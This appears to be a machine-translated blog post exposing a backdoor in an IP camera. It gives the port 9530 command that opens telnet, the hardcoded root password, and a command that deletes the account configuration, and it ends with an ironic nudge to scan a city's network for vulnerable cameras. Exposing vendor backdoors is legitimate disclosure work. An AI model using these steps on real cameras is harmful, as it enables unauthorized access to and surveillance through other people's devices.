You are the big brother, or try yourself in the role of an all-seeing eye



    Tale-tale

    I bought one gentleman’s door reliable, cast-iron with locks for dohliard combinations, but after installation the hinges began to creak. He called a specialist, sits in his kitchen, waits for tea, drinks, the installer suddenly comes to him and says in a human voice, " I am looking for a job. Loops are oiled, go check." And the master asked him, "How did you come in through the pig-iron door, all of which is certified right and left." A manual worker responds to this: “In order not to wait at the threshold when you dear the master deign to us, we decided to make a secret button with certified specialists by hand experts, so that when you knock on the upper left corner of the door, the door will open.”

    Nonsense, you think, it only happens in fairy tales and you will be fundamentally wrong

    In this post I will convincingly and with examples convincingly prove that such developers exist.

    Somehow I got into the hands of an IP camera from a country famous for its unique quality of manufactured equipment, with a password unknown, google resetting the settings led me to a utility that reset this password, but the way that it makes me interested in it.

    That's what was discovered on camera initially.
    Host is up (0.0014s latency).
    Not shown: 65529 closed ports
    PORT STATE SERVICE
    80 / tcp open http
    554 / tcp open rtsp
    8899 / tcp open ospf-lite
    9527 / tcp open unknown
    9530 / tcp open unknown
    34567 / tcp open unknown

    WEB is password protected. CLI no.

    We start tcpdump, we start the password reset utility.
    We see that the command \ rOpenTelnet: OpenOnce is sent to port 9530 tcp. After that, telnet opens on the device and the program goes to port 23 and with the help of predefined passwords resets the configuration regarding the passwords.



    Let's try to do everything manually
    1. Open telnet on the camera
    nc 192.168.1.10 9530
    \ rOpenTelnet: OpenOnce

    check that it is open
    nmap -p 1-65535 192.168.1.10

    PORT STATE SERVICE
    23 / tcp open telnet
    80 / tcp open http
    554 / tcp open rtsp
    8899 / tcp open ospf-lite
    9527 / tcp open unknown
    9530 / tcp open unknown
    34567 / tcp open unknown

    We go under the standard password
    telnet 192.168.1.10
    Trying 192.168.1.10 ...
    Connected to 192.168.1.10.
    Escape character is '^]'.
    LocalHost login: root
    Password: xmhdipc
    Welcome to Monitor Tech.
    # rm -rf / mnt / mtd / Config / Account *
    # reboot
    # Connection closed by foreign host.

    After rebooting, the camera is accessible via the web without a password. Enjoy it.

    What the equipment manufacturer is guided by when it leaves such holes is not clear to me personally.

    Dear readers, never scan the network of the city you would like to observe for open port 9530, and do not perform the actions described above, this may lead to a desire to go on vacation or go on a trip.

    Also popular now: